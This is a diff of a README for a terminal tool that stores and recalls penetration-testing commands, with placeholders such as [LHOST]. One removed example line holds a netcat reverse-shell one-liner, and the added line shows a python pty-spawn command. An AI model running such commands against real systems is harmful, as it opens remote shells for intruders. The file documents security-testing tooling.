gregscharf/RTFM-Redox/README.md

 - up/down arrow keys to highlight a command from the current search or from the history.
 Pressing return copies that command to the clipboard.
 - 'info' displays full information on the currently selected command along with any variables that can be set and that are already set.
 - 'add -c [command]' to add a new command to the database.  optional: -d to add a comment/description with the command.
 - 'update [column] [content]' to update a database column in the currently selected command.
 At the moment the only columns to update are 'command', 'comment' and 'author'.
-Examples: 'update comment spawn a pty via python3', 'update author greg scharf', 'update command rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [LHOST] [LPORT] >/tmp/f'.
+Examples: "update comment spawn a pty via python3", "update author greg scharf", "update command python3 -c 'import pty;pty.spawn("/bin/bash")'".
 - 'set' to set variables that will be replaced in commands that have placeholders such as [LHOST], [RHOST], etc. Example: 'set LHOST 10.200.13.3'

 ## To Add